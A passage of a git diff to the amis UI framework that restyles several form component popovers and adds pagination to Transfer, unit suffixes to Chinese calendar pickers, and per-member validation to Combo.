.#{$ns}Tabs-linksContainer-main > .#{$ns}Tabs-links { @@ -1224,21 +1236,6 @@ > .#{$ns}Tabs-linksContainer { margin-bottom: calc(var(--Tabs-borderWidth) * -1); - &.#{$ns}Tabs-linksContainer--overflow - > .#{$ns}Tabs-linksContainer-main - > .#{$ns}Tabs-links - > .#{$ns}Tabs-link { - &:first-of-type { - border-left-width: 0; - border-top-left-radius: 0; - } - - &:last-of-type { - border-right-width: 0; - border-top-right-radius: 0; - } - } - .#{$ns}Tabs-linksContainer-arrow { width: var(--Tabs--strong-arrow-size); margin-bottom: 0; @@ -1250,14 +1247,14 @@ &--left { padding-right: 0; - border-right-width: 0; border-top-left-radius: var(--Tabs-borderRadius); + margin-right: px2rem(8px); } &--right { padding-left: 0; - border-left-width: 0; - border-top-right-radius: var(--Tabs-borderRadius); + border-top-left-radius: var(--Tabs-borderRadius); + margin-left: px2rem(8px); } } diff --git a/packages/amis-ui/scss/components/form/_combo.scss b/packages/amis-ui/scss/components/form/_combo.scss index e90f64b52..8a636c20f 100644 --- a/packages/amis-ui/scss/components/form/_combo.scss +++ b/packages/amis-ui/scss/components/form/_combo.scss @@ -258,6 +258,12 @@ var(--combo-vertical-paddingRight) var(--combo-vertical-paddingBottom) var(--combo-vertical-paddingLeft); position: relative; + + &.has-error { + border-color: var( + --Combo--vertical-item--onError-borderColor + ) !important; // 因为下面的规则权重更高 &:not(.is-disabled) > .#{$ns}Combo-items > .#{$ns}Combo-item:hover + } } > .#{$ns}Combo-items > .#{$ns}Combo-item { diff --git a/packages/amis-ui/scss/components/form/_date-range.scss b/packages/amis-ui/scss/components/form/_date-range.scss index 472bd0a72..d1cb8b22f 100644 --- a/packages/amis-ui/scss/components/form/_date-range.scss +++ b/packages/amis-ui/scss/components/form/_date-range.scss @@ -257,12 +257,9 @@ } .#{$ns}DateRangePicker-popover { - margin: px2rem(2px) 0 0; - - &.#{$ns}PopOver--leftTopLeftBottom, - &.#{$ns}PopOver--rightTopRightBottom { - margin: px2rem(-2px) 0 0; - } 
+ border: var(--Form-select-outer-borderWidth) solid + var(--Form-input-onFocused-borderColor); + box-shadow: var(--Form-select-outer-boxShadow); } .#{$ns}DateRangePicker-popup { diff --git a/packages/amis-ui/scss/components/form/_date.scss b/packages/amis-ui/scss/components/form/_date.scss index 8dbb83150..fdaf4b64f 100644 --- a/packages/amis-ui/scss/components/form/_date.scss +++ b/packages/amis-ui/scss/components/form/_date.scss @@ -200,11 +200,9 @@ .#{$ns}DatePicker-popover { margin: px2rem(2px) 0 0; - - &.#{$ns}PopOver--leftTopLeftBottom, - &.#{$ns}PopOver--rightTopRightBottom { - margin: px2rem(-2px) 0 0; - } + border: var(--Form-select-outer-borderWidth) solid + var(--Form-input-onFocused-borderColor); + box-shadow: var(--Form-select-outer-boxShadow); } // 移动端输入框样式 diff --git a/packages/amis-ui/scss/components/form/_nested-select.scss b/packages/amis-ui/scss/components/form/_nested-select.scss index 86743da5e..e54305cf1 100644 --- a/packages/amis-ui/scss/components/form/_nested-select.scss +++ b/packages/amis-ui/scss/components/form/_nested-select.scss @@ -4,7 +4,7 @@ .#{$ns}NestedSelect-menu { padding-top: px2rem(4px); padding-bottom: px2rem(4px); - box-shadow: 0 px2rem(2px) px2rem(8px) 0 rgba(7, 12, 20, 0.12); + box-shadow: var(--Form-select-outer-boxShadow); } } @@ -18,8 +18,6 @@ &-optionArrowRight { display: inline-block; - padding-right: var(--Form-select-icon-rigin); - svg { width: px2rem(10px); height: px2rem(10px); @@ -29,6 +27,12 @@ } } + &-optionArrowRight.is-disabled { + svg { + color: var(--text--muted-color); + } + } + &-menuOuter { display: flex; } @@ -56,19 +60,23 @@ max-height: px2rem(175px); background: var(--Form-select-menu-bg); color: var(--Form-select-menu-color); - border: var(--Form-select-outer-borderWidth) solid - var(--Form-input-onFocused-borderColor); + border-radius: var(--borderRadius); box-shadow: var(--Form-select-outer-boxShadow); overflow-y: auto; overflow-x: hidden; - + border: var(--Form-select-outer-borderWidth) solid + 
var(--Form-input-onFocused-borderColor); &:not(:first-child) { border-left: 0; + margin-left: px2rem(4px); } .#{$ns}NestedSelect-option { position: relative; - padding-left: var(--gap-md); + padding: var(--select-base-default-option-paddingTop) + var(--select-base-default-option-paddingRight) + var(--select-base-default-option-paddingBottom) + var(--select-base-default-option-paddingLeft); min-height: var(--select-base-default-option-line-height); line-height: var(--select-base-default-option-line-height); cursor: pointer; @@ -122,3 +130,8 @@ height: px2rem(340px); } } + +.#{$ns}NestedSelect-popover { + border: none; + box-shadow: none; +} diff --git a/packages/amis-ui/scss/components/form/_select.scss b/packages/amis-ui/scss/components/form/_select.scss index 6b3753821..7f2f7c416 100644 --- a/packages/amis-ui/scss/components/form/_select.scss +++ b/packages/amis-ui/scss/components/form/_select.scss @@ -584,26 +584,15 @@ } .#{$ns}Select-popover { - margin-top: calc(var(--Form-select-outer-borderWidth) * -1); - background: var(--Form-select-menu-bg); color: var(--Form-select-menu-color); border: var(--Form-select-outer-borderWidth) solid var(--Form-input-onFocused-borderColor); box-shadow: var(--Form-select-outer-boxShadow); - border-top-left-radius: 0; - border-top-right-radius: 0; // min-width: px2rem(100px); // PopOver 上已经配置了,这个要是配置就会覆盖,所以先干掉好了 // z-index: 10; - - &.#{$ns}PopOver--leftTopLeftBottom { - margin-top: calc( - (var(--Form-select-popoverGap) - var(--Form-select-outer-borderWidth)) * - -1 - ); - } } .#{$ns}SelectControl { diff --git a/packages/amis-ui/scss/components/form/_text.scss b/packages/amis-ui/scss/components/form/_text.scss index 46fd4fc99..164392304 100644 --- a/packages/amis-ui/scss/components/form/_text.scss +++ b/packages/amis-ui/scss/components/form/_text.scss @@ -319,7 +319,10 @@ background: var(--Form-select-menu-bg); color: var(--Form-select-menu-color); border-radius: px2rem(2px); - box-shadow: var(--menu-box-shadow); + box-shadow: 
var(--Form-select-outer-boxShadow); + border: var(--Form-select-outer-borderWidth) solid + var(--Form-input-onFocused-borderColor); + padding: px2rem(4px) 0; } &-sugs { @@ -328,13 +331,11 @@ } &-sugItem { - padding: calc( - ( - var(--Form-selectOption-height) - var(--Form-input-lineHeight) * - var(--Form-input-fontSize) - #{px2rem(2px)} - ) / 2 - ) - px2rem(12px); + padding: var(--select-base-default-option-paddingTop) + var(--select-base-default-option-paddingRight) + var(--select-base-default-option-paddingBottom) + var(--select-base-default-option-paddingLeft); + line-height: var(--select-base-default-option-line-height); svg { width: px2rem(16px); diff --git a/packages/amis-ui/scss/components/form/_transfer.scss b/packages/amis-ui/scss/components/form/_transfer.scss index fbb24dd3a..dfec6c386 100644 --- a/packages/amis-ui/scss/components/form/_transfer.scss +++ b/packages/amis-ui/scss/components/form/_transfer.scss @@ -39,6 +39,42 @@ } } + &-footer { + border-top: 1px solid var(--transfer-base-footer-border-color); + display: flex; + flex-flow: row nowrap; + justify-content: flex-end; + padding: var(--gap-sm); + + /* 底部空间较小,让Pagination紧凑一些 */ + &-pagination { + & > ul { + &.#{$ns}Pagination-item { + margin-left: 0; + } + + & > li { + --Pagination-minWidth: #{px2rem(22px)}; + --Pagination-height: #{px2rem(22px)}; + --Pagination-padding: 0 #{px2rem(6px)}; + } + } + + .#{$ns}Pagination-perpage { + --select-base-default-paddingTop: 0; + --select-base-default-paddingBottom: 0; + --select-base-default-paddingLeft: #{px2rem(6px)}; + --select-base-default-paddingRight: #{px2rem(6px)}; + + margin-left: 0; + + .#{$ns}Select-valueWrap { + line-height: #{px2rem(22px)}; + } + } + } + } + &-select, &-result { overflow: hidden; @@ -64,6 +100,10 @@ var(--transfer-base-top-right-border-radius) var(--transfer-base-bottom-right-border-radius) var(--transfer-base-bottom-left-border-radius); + + &--pagination { + max-height: px2rem(475px); + } } &-select > &-selection, diff --git 
a/packages/amis-ui/src/components/Range.tsx b/packages/amis-ui/src/components/Range.tsx index 333110fed..a074df720 100644 --- a/packages/amis-ui/src/components/Range.tsx +++ b/packages/amis-ui/src/components/Range.tsx @@ -383,11 +383,16 @@ export class Range extends React.Component<RangeItemProps, any> { getStepValue(value: number, step: number) { const surplus = value % step; let result = 0; + let closeNum = Math.floor(value - (value % step)); // 余数 >= 步长一半 -> 向上取 // 余数 < 步长一半 -> 向下取 const _value = surplus >= step / 2 ? value : safeSub(value, step); while (result <= _value) { - result = safeAdd(result, step); + if (step < 1 || result === 0 || result === closeNum) { + result = safeAdd(result, step); + } else { + result = closeNum; + } } return result; } diff --git a/packages/amis-ui/src/components/Tabs.tsx b/packages/amis-ui/src/components/Tabs.tsx index ea5c2f0f5..6a049253c 100644 --- a/packages/amis-ui/src/components/Tabs.tsx +++ b/packages/amis-ui/src/components/Tabs.tsx @@ -50,6 +50,7 @@ export interface TabProps extends ThemeProps { tip?: string; tab?: Schema; className?: string; + tabClassName?: string; activeKey?: string | number; reload?: boolean; mountOnEnter?: boolean; @@ -738,7 +739,7 @@ export class Tabs extends React.Component<TabsProps, any> { disabled && 'Tabs-linksContainer-arrow--disabled' )} > - <i className={'iconfont icon-arrow-' + type} /> + <Icon icon="right-arrow-bold" className="icon" /> </div> ) : null; } diff --git a/packages/amis-ui/src/components/Transfer.tsx b/packages/amis-ui/src/components/Transfer.tsx index a8010072e..0c4c68f5f 100644 --- a/packages/amis-ui/src/components/Transfer.tsx +++ b/packages/amis-ui/src/components/Transfer.tsx @@ -4,7 +4,6 @@ import includes from 'lodash/includes'; import debounce from 'lodash/debounce'; import isEqual from 'lodash/isEqual'; import unionWith from 'lodash/unionWith'; - import {ThemeProps, themeable, findTree, differenceFromAll} from 'amis-core'; import {BaseSelectionProps, BaseSelection, 
ItemRenderStates} from './Selection'; import {Options, Option} from './Select'; @@ -24,6 +23,7 @@ import {ItemRenderStates as ResultItemRenderStates} from './ResultList'; import ResultTableList from './ResultTableList'; import ResultTreeList from './ResultTreeList'; import {SpinnerExtraProps} from './Spinner'; +import Pagination from './Pagination'; export type SelectMode = | 'table' @@ -113,6 +113,44 @@ export interface TransferProps checkAllLabel?: string; /** 树形模式下,给 tree 的属性 */ onlyChildren?: boolean; + /** 分页模式下累积的选项值,用于右侧回显 */ + accumulatedOptions?: Option[]; + /** 分页配置 */ + pagination?: { + /** 是否开启分页 */ + enable: boolean; + /** 分页组件CSS类名 */ + className?: string; + /** + * 通过控制layout属性的顺序,调整分页结构 total,perPage,pager,go + * @default 'pager' + */ + layout?: string | Array<string>; + + /** + * 指定每页可以显示多少条 + * @default [10, 20, 50, 100] + */ + perPageAvailable?: Array<number>; + + /** + * 最多显示多少个分页按钮。 + * + * @default 5 + */ + maxButtons?: number; + page?: number; + perPage?: number; + total?: number; + popOverContainer?: any; + popOverContainerSelector?: string; + }; + /** 切换分页事件 */ + onPageChange?: ( + page: number, + perPage?: number, + direction?: 'forward' | 'backward' + ) => void; } export interface TransferState { @@ -549,10 +587,33 @@ export class Transfer< {this.state.searchResult !== null ? this.renderSearchResult(props) : this.renderOptions(props)} + + {this.renderFooter()} </> ); } + renderFooter() { + const {classnames: cx, pagination, onPageChange} = this.props; + + return pagination?.enable ? 
( + <div className={cx('Transfer-footer')}> + <Pagination + className={cx('Transfer-footer-pagination', pagination.className)} + activePage={pagination.page} + perPage={pagination.perPage} + total={pagination.total} + layout={pagination.layout} + maxButtons={pagination.maxButtons} + perPageAvailable={pagination.perPageAvailable} + popOverContainer={pagination.popOverContainer} + popOverContainerSelector={pagination.popOverContainerSelector} + onPageChange={onPageChange} + /> + </div> + ) : null; + } + renderSearchResult(props: TransferProps) { const { searchResultMode, @@ -827,9 +888,10 @@ export class Transfer< virtualThreshold, itemHeight, loadingConfig, - showInvalidMatch + showInvalidMatch, + pagination, + accumulatedOptions } = this.props; - const {resultSelectMode, isTreeDeferLoad} = this.state; const searchable = !isTreeDeferLoad && resultSearchable; @@ -840,7 +902,7 @@ export class Transfer< ref={this.domResultRef} classnames={cx} columns={columns!} - options={options || []} + options={(pagination?.enable ? accumulatedOptions : options) || []} value={value} disabled={disabled} option2value={option2value} @@ -862,7 +924,7 @@ export class Transfer< loadingConfig={loadingConfig} classnames={cx} className={cx('Transfer-value')} - options={options} + options={(pagination?.enable ? accumulatedOptions : options) || []} valueField={'value'} value={value || []} onChange={onChange!} @@ -915,7 +977,8 @@ export class Transfer< selectMode = 'list', translate: __, valueField = 'value', - mobileUI + mobileUI, + pagination } = this.props as any; const {searchResult} = this.state; @@ -939,7 +1002,11 @@ export class Transfer< <div className={cx('Transfer', className, inline ? 
'Transfer--inline' : '')} > - <div className={cx('Transfer-select')}> + <div + className={cx('Transfer-select', { + 'Transfer-select--pagination': !!pagination?.enable + })} + > {this.renderSelect(this.props)} </div> <div className={cx('Transfer-mid', {'is-mobile': mobileUI})}> @@ -949,7 +1016,12 @@ export class Transfer< </div> ) : null} </div> - <div className={cx('Transfer-result', {'is-mobile': mobileUI})}> + <div + className={cx('Transfer-result', { + 'is-mobile': mobileUI, + 'Transfer-select--pagination': !!pagination?.enable + })} + > <div className={cx( 'Transfer-title', diff --git a/packages/amis-ui/src/components/calendar/DaysView.tsx b/packages/amis-ui/src/components/calendar/DaysView.tsx index 412921aac..ad1900a7b 100644 --- a/packages/amis-ui/src/components/calendar/DaysView.tsx +++ b/packages/amis-ui/src/components/calendar/DaysView.tsx @@ -239,7 +239,7 @@ export class CustomDaysView extends React.Component<CustomDaysViewProps> { const dateBoundary = this.props.getDateBoundary(currentDate); const columns = this.props.getColumns(types, dateBoundary); this.state = { - columns, + columns: this.getColumnsWithUnit(columns), types, pickerValue: currentDate.toArray(), uniqueTag: new Date().valueOf() @@ -277,6 +277,19 @@ export class CustomDaysView extends React.Component<CustomDaysViewProps> { }); } + getColumnsWithUnit(columns: {options: PickerOption[]}[]) { + return this.props.locale === 'zh-CN' && columns.length === 3 + ? columns.map((item, index) => { + item.options?.map((option: any) => { + option.text = + option.text + (index === 0 ? '年' : index === 1 ? 
'月' : '日'); + return option; + }); + return item; + }) + : columns; + } + updateSelectedDate = (event: React.MouseEvent<any>) => { // need confirm if (this.props.requiredConfirm) { @@ -767,7 +780,9 @@ export class CustomDaysView extends React.Component<CustomDaysViewProps> { ); const dateBoundary = this.props.getDateBoundary(selectDate); this.setState({ - columns: this.props.getColumns(this.state.types, dateBoundary), + columns: this.getColumnsWithUnit( + this.props.getColumns(this.state.types, dateBoundary) + ), pickerValue: value }); } diff --git a/packages/amis-ui/src/components/calendar/MonthsView.tsx b/packages/amis-ui/src/components/calendar/MonthsView.tsx index d8092039a..0463711b0 100644 --- a/packages/amis-ui/src/components/calendar/MonthsView.tsx +++ b/packages/amis-ui/src/components/calendar/MonthsView.tsx @@ -63,7 +63,7 @@ export class CustomMonthsView extends React.Component<CustomMonthsViewProps> { const dateBoundary = this.props.getDateBoundary(currentDate); const columns = this.props.getColumns(['year', 'month'], dateBoundary); this.state = { - columns, + columns: this.getColumnsWithUnit(columns), pickerValue: currentDate.toArray() }; @@ -141,6 +141,18 @@ export class CustomMonthsView extends React.Component<CustomMonthsViewProps> { this.props.updateSelectedDate(event); } + getColumnsWithUnit(columns: {options: PickerOption[]}[]) { + return this.props.locale === 'zh-CN' && columns.length === 2 + ? columns.map((item, index) => { + item.options?.map((option: any) => { + option.text = option.text + (index === 0 ? 
'年' : '月'); + return option; + }); + return item; + }) + : columns; + } + renderMonth = ( props: any, month: number, @@ -205,7 +217,10 @@ export class CustomMonthsView extends React.Component<CustomMonthsViewProps> { }; }) }; - this.setState({columns, pickerValue: value}); + this.setState({ + columns: this.getColumnsWithUnit(columns), + pickerValue: value + }); } }; diff --git a/packages/amis/src/renderers/CRUD.tsx b/packages/amis/src/renderers/CRUD.tsx index 570985640..2c1094b92 100644 --- a/packages/amis/src/renderers/CRUD.tsx +++ b/packages/amis/src/renderers/CRUD.tsx @@ -2218,7 +2218,7 @@ export default class CRUD extends React.Component<CRUDProps, any> { toolbar.align || (type === 'pagination' ? 'right' : 'left'); return ( <div - key={index} + key={toolbar.id || index} className={cx( 'Crud-toolbar-item', align ? `Crud-toolbar-item--${align}` : '', diff --git a/packages/amis/src/renderers/Cards.tsx b/packages/amis/src/renderers/Cards.tsx index 11acc9823..001a73dda 100644 --- a/packages/amis/src/renderers/Cards.tsx +++ b/packages/amis/src/renderers/Cards.tsx @@ -11,7 +11,9 @@ import { difference, ucFirst, autobind, - createObject + createObject, + CustomStyle, + setThemeClassName } from 'amis-core'; import { isPureVariable, @@ -923,7 +925,10 @@ export default class Cards extends React.Component<GridProps, object> { translate: __, loading = false, loadingConfig, - env + env, + id, + wrapperCustomStyle, + themeCss } = this.props; this.renderedToolbars = []; // 用来记录哪些 toolbar 已经渲染了,已经渲染了就不重复渲染了。 @@ -973,9 +978,15 @@ export default class Cards extends React.Component<GridProps, object> { return ( <div ref={this.bodyRef} - className={cx('Cards', className, { - 'Cards--unsaved': !!store.modified || !!store.moved - })} + className={cx( + 'Cards', + className, + { + 'Cards--unsaved': !!store.modified || !!store.moved + }, + setThemeClassName('baseControlClassName', id, themeCss), + setThemeClassName('wrapperCustomStyle', id, wrapperCustomStyle) + )} 
style={buildStyle(style, data)} > {affixHeader ? ( @@ -1007,6 +1018,20 @@ export default class Cards extends React.Component<GridProps, object> { {footer} <Spinner loadingConfig={loadingConfig} overlay show={loading} /> + + <CustomStyle + config={{ + wrapperCustomStyle, + id, + themeCss, + classNames: [ + { + key: 'baseControlClassName' + } + ] + }} + env={env} + /> </div> ); } diff --git a/packages/amis/src/renderers/Each.tsx b/packages/amis/src/renderers/Each.tsx index a5234d45a..f66f0792f 100644 --- a/packages/amis/src/renderers/Each.tsx +++ b/packages/amis/src/renderers/Each.tsx @@ -1,5 +1,12 @@ import React from 'react'; -import {Renderer, RendererProps, buildStyle, isPureVariable} from 'amis-core'; +import { + CustomStyle, + Renderer, + RendererProps, + buildStyle, + isPureVariable, + setThemeClassName +} from 'amis-core'; import {Schema} from 'amis-core'; import {resolveVariable, resolveVariableAndFilter} from 'amis-core'; import {createObject, getPropValue, isObject} from 'amis-core'; @@ -96,7 +103,11 @@ export default class Each extends React.Component<EachProps> { indexKeyName, placeholder, classnames: cx, - translate: __ + translate: __, + env, + id, + wrapperCustomStyle, + themeCss } = this.props; const value = getPropValue(this.props, props => @@ -124,7 +135,14 @@ export default class Each extends React.Component<EachProps> { } return ( - <div className={cx('Each', className)} style={buildStyle(style, data)}> + <div + className={cx( + 'Each', + className, + setThemeClassName('baseControlClassName', id, themeCss) + )} + style={buildStyle(style, data)} + > {Array.isArray(arr) && arr.length && items ? 
( arr.map((item: any, index: number) => ( <EachItem @@ -144,6 +162,20 @@ export default class Each extends React.Component<EachProps> { {render('placeholder', __(placeholder))} </div> )} + + <CustomStyle + config={{ + wrapperCustomStyle, + id, + themeCss, + classNames: [ + { + key: 'baseControlClassName' + } + ] + }} + env={env} + /> </div> ); } diff --git a/packages/amis/src/renderers/Form/Combo.tsx b/packages/amis/src/renderers/Form/Combo.tsx index 8d51f0f53..0dea000a6 100644 --- a/packages/amis/src/renderers/Form/Combo.tsx +++ b/packages/amis/src/renderers/Form/Combo.tsx @@ -8,7 +8,10 @@ import { resolveEventData, ApiObject, FormHorizontal, - evalExpressionWithConditionBuilder + evalExpressionWithConditionBuilder, + IFormStore, + getVariable, + IFormItemStore } from 'amis-core'; import {ActionObject, Api} from 'amis-core'; import {ComboStore, IComboStore} from 'amis-core'; @@ -37,7 +40,11 @@ import {isEffectiveApi, str2AsyncFunction} from 'amis-core'; import {Alert2} from 'amis-ui'; import memoize from 'lodash/memoize'; import {Icon} from 'amis-ui'; -import {isAlive} from 'mobx-state-tree'; +import { + isAlive, + clone as cloneModel, + destroy as destroyModel +} from 'mobx-state-tree'; import { FormBaseControlSchema, SchemaApi, @@ -48,7 +55,6 @@ import { import {ListenerAction} from 'amis-core'; import type {SchemaTokenizeableString} from '../../Schema'; import isPlainObject from 'lodash/isPlainObject'; -import {isMobile} from 'amis-core'; export type ComboCondition = { test: string; @@ -395,6 +401,7 @@ export default class ComboControl extends React.Component<ComboProps> { this.dragTipRef = this.dragTipRef.bind(this); this.flush = this.flush.bind(this); this.handleComboTypeChange = this.handleComboTypeChange.bind(this); + this.handleSubFormValid = this.handleSubFormValid.bind(this); this.defaultValue = { ...props.scaffold }; @@ -797,6 +804,11 @@ export default class ComboControl extends React.Component<ComboProps> { ); } + handleSubFormValid(valid: boolean, 
{index}: any) { + const {store} = this.props; + store.setMemberValid(valid, index); + } + handleFormInit(values: any, {index}: any) { const { syncDefaultValue, @@ -806,9 +818,15 @@ export default class ComboControl extends React.Component<ComboProps> { formInited, onChange, submitOnChange, - setPrinstineValue + setPrinstineValue, + formItem } = this.props; + // 已经开始验证了,那么打开成员的时候,就要验证一下。 + if (formItem?.validated) { + this.subForms[index]?.validate(true, false, false); + } + this.subFormDefaultValues.push({ index, values, @@ -881,7 +899,13 @@ export default class ComboControl extends React.Component<ComboProps> { } validate(): any { - const {messages, nullable, translate: __} = this.props; + const { + messages, + nullable, + value: rawValue, + translate: __, + store + } = this.props; const value = this.getValueAsArray(); const minLength = this.resolveVariableProps(this.props, 'minLength'); const maxLength = this.resolveVariableProps(this.props, 'maxLength'); @@ -896,18 +920,62 @@ export default class ComboControl extends React.Component<ComboProps> { (messages && messages.maxLengthValidateFailed) || 'Combo.maxLength', {maxLength} ); - } else if (this.subForms.length && (!nullable || value)) { - return Promise.all(this.subForms.map(item => item.validate())).then( - values => { - if (~values.indexOf(false)) { - return __( - (messages && messages.validateFailed) || 'validateFailed' - ); + } else if (nullable && !rawValue) { + return; // 不校验 + } else if (value.length) { + return Promise.all( + value.map(async (values: any, index: number) => { + const subForm = this.subForms[index]; + if (subForm) { + return subForm.validate(true, false, false); + } else { + // 那些还没有渲染出来的数据 + // 因为有可能存在分页,有可能存在懒加载,所以没办法直接用 subForm 去校验了 + const subForm = this.subForms[Object.keys(this.subForms)[0] as any]; + if (subForm) { + const form: IFormStore = subForm.props.store; + let valid = false; + for (let formitem of form.items) { + const cloned: IFormItemStore = cloneModel(formitem); + let 
value: any = getVariable(values, formitem.name, false); + + if (formitem.extraName) { + value = [ + getVariable(values, formitem.name, false), + getVariable(values, formitem.extraName, false) + ]; + } + + cloned.changeTmpValue(value, 'dataChanged'); + valid = await cloned.validate(values); + destroyModel(cloned); + if (valid === false) { + break; + } + } + + store.setMemberValid(valid, index); + return valid; + } } + }) + ).then(values => { + if (~values.indexOf(false)) { + return __((messages && messages.validateFailed) || 'validateFailed'); + } - return; + return; + }); + } else if (this.subForms.length) { + return Promise.all( + this.subForms.map(item => item.validate(true, false, false)) + ).then(values => { + if (~values.indexOf(false)) { + return __((messages && messages.validateFailed) || 'validateFailed'); } - ); + + return; + }); } } @@ -1253,6 +1321,12 @@ export default class ComboControl extends React.Component<ComboProps> { // 不能按需渲染,因为 unique 会失效。 mountOnEnter={!hasUnique} unmountOnExit={false} + className={ + store.memberValidMap[index] === false ? 'has-error' : '' + } + tabClassName={ + store.memberValidMap[index] === false ? 'has-error' : '' + } > {condition && typeSwitchable !== false ? ( <div className={cx('Combo-itemTag')}> @@ -1485,7 +1559,8 @@ export default class ComboControl extends React.Component<ComboProps> { itemClassName, itemsWrapperClassName, static: isStatic, - mobileUI + mobileUI, + store } = this.props; let items = this.props.items; @@ -1543,7 +1618,11 @@ export default class ComboControl extends React.Component<ComboProps> { return ( <div - className={cx(`Combo-item`, itemClassName)} + className={cx( + `Combo-item`, + itemClassName, + store.memberValidMap[index] === false ? 'has-error' : '' + )} key={this.keys[index]} > {!isStatic && !disabled && draggable && thelist.length > 1 ? 
( @@ -1622,7 +1701,8 @@ export default class ComboControl extends React.Component<ComboProps> { nullable, translate: __, itemClassName, - mobileUI + mobileUI, + store } = this.props; let items = this.props.items; @@ -1646,7 +1726,13 @@ export default class ComboControl extends React.Component<ComboProps> { disabled ? 'is-disabled' : '' )} > - <div className={cx(`Combo-item`, itemClassName)}> + <div + className={cx( + `Combo-item`, + itemClassName, + store.memberValidMap[0] === false ? 'has-error' : '' + )} + > {condition && typeSwitchable !== false ? ( <div className={cx('Combo-itemTag')}> <label>{__('Combo.type')}</label> @@ -1715,11 +1801,13 @@ export default class ComboControl extends React.Component<ComboProps> { className: cx(`Combo-form`, formClassName) }, { + index: 0, disabled: disabled, static: isStatic, data, onChange: this.handleSingleFormChange, ref: this.makeFormRef(0), + onValidChange: this.handleSubFormValid, onInit: this.handleSingleFormInit, canAccessSuperData, formStore: undefined, @@ -1749,6 +1837,7 @@ export default class ComboControl extends React.Component<ComboProps> { onAction: this.handleAction, onRadioChange: this.handleRadioChange, ref: this.makeFormRef(index), + onValidChange: this.handleSubFormValid, canAccessSuperData, lazyChange: changeImmediately ? 
false : true, formLazyChange: false, diff --git a/packages/amis/src/renderers/Form/NestedSelect.tsx b/packages/amis/src/renderers/Form/NestedSelect.tsx index 4eee55e98..22cb17468 100644 --- a/packages/amis/src/renderers/Form/NestedSelect.tsx +++ b/packages/amis/src/renderers/Form/NestedSelect.tsx @@ -172,6 +172,11 @@ export default class NestedSelectControl extends React.Component< return !!rendererEvent?.prevented; } + /** 是否为父节点 */ + isParentNode(option: Option) { + return Array.isArray(option.children) && option.children.length > 0; + } + @autobind handleOutClick(e: React.MouseEvent<any>) { const {options} = this.props; @@ -295,7 +300,7 @@ export default class NestedSelectControl extends React.Component< return; } - if (onlyLeaf && option.children) { + if (onlyLeaf && this.isParentNode(option)) { return; } @@ -327,7 +332,7 @@ export default class NestedSelectControl extends React.Component< let valueField = this.props.valueField || 'value'; - if (onlyLeaf && !Array.isArray(option) && option.children) { + if (onlyLeaf && !Array.isArray(option) && this.isParentNode(option)) { return; } @@ -431,6 +436,7 @@ export default class NestedSelectControl extends React.Component< allChecked(options: Options): boolean { const {selectedOptions, withChildren, onlyChildren} = this.props; + return options.every(option => { if ((withChildren || onlyChildren) && option.children) { return this.allChecked(option.children); @@ -683,8 +689,8 @@ export default class NestedSelectControl extends React.Component< if ( !selfChecked && onlyChildren && - option.children && - this.allChecked(option.children) + this.isParentNode(option) && + this.allChecked(option.children!) ) { selfChecked = true; } @@ -728,7 +734,11 @@ export default class NestedSelectControl extends React.Component< </div> {option.children && option.children.length ? 
( - <div className={cx('NestedSelect-optionArrowRight')}> + <div + className={cx('NestedSelect-optionArrowRight', { + 'is-disabled': nodeDisabled + })} + > <Icon icon="right-arrow-bold" className="icon" /> </div> ) : null} @@ -799,8 +809,8 @@ export default class NestedSelectControl extends React.Component< if ( !isChecked && onlyChildren && - option.children && - this.allChecked(option.children) + this.isParentNode(option) && + this.allChecked(option.children!) ) { isChecked = true; } diff --git a/packages/amis/src/renderers/Form/Transfer.tsx b/packages/amis/src/renderers/Form/Transfer.tsx index 44a8c5c0f..695d05461 100644 --- a/packages/amis/src/renderers/Form/Transfer.tsx +++ b/packages/amis/src/renderers/Form/Transfer.tsx @@ -1,17 +1,17 @@ import React from 'react'; import find from 'lodash/find'; - +import pick from 'lodash/pick'; +import {isAlive} from 'mobx-state-tree'; +import {matchSorter} from 'match-sorter'; import { OptionsControlProps, OptionsControl, - FormOptionsControl, resolveEventData, str2function, - getOptionValueBindField -} from 'amis-core'; -import {SpinnerExtraProps, Transfer} from 'amis-ui'; -import type {Option} from 'amis-core'; -import { + getOptionValueBindField, + isEffectiveApi, + isPureVariable, + resolveVariableAndFilter, autobind, filterTree, string2regExp, @@ -20,18 +20,25 @@ import { findTreeIndex, getTree, spliceTree, - mapTree + mapTree, + optionValueCompare, + resolveVariable, + ActionObject, + toNumber } from 'amis-core'; -import {Spinner} from 'amis-ui'; -import {optionValueCompare} from 'amis-core'; -import {resolveVariable} from 'amis-core'; -import {FormOptionsSchema, SchemaApi, SchemaObject} from '../../Schema'; -import {Selection as BaseSelection} from 'amis-ui'; -import {ResultList} from 'amis-ui'; -import {ActionObject, toNumber} from 'amis-core'; -import type {ItemRenderStates} from 'amis-ui/lib/components/Selection'; +import {SpinnerExtraProps, Transfer, Spinner, ResultList} from 'amis-ui'; +import { + 
FormOptionsSchema, + SchemaApi, + SchemaObject, + SchemaExpression, + SchemaClassName +} from '../../Schema'; import {supportStatic} from './StaticHoc'; -import {matchSorter} from 'match-sorter'; + +import type {ItemRenderStates} from 'amis-ui/lib/components/Selection'; +import type {Option} from 'amis-core'; +import type {PaginationSchema} from '../Pagination'; /** * Transfer @@ -161,6 +168,22 @@ export interface TransferControlSchema * 树形模式下,仅选中子节点 */ onlyChildren?: boolean; + + /** + * 分页配置,selectMode为默认和table才会生效 + * @since 3.6.0 + */ + pagination?: { + /** 是否左侧选项分页,默认不开启 */ + enable: SchemaExpression; + /** 分页组件CSS类名 */ + className?: SchemaClassName; + /** 是否开启前端分页 */ + loadDataOnce?: boolean; + } & Pick< + PaginationSchema, + 'layout' | 'maxButtons' | 'perPageAvailable' | 'popOverContainerSelector' + >; } export interface BaseTransferProps @@ -427,6 +450,30 @@ export class BaseTransferRenderer< return regexp.test(labelTest) || regexp.test(valueTest); } + @autobind + handlePageChange( + page: number, + perPage?: number, + direction?: 'forward' | 'backward' + ) { + const {source, data, formItem, onChange} = this.props; + const ctx = createObject(data, { + page: page ?? 1, + perPage: perPage ?? 10, + ...(direction ? 
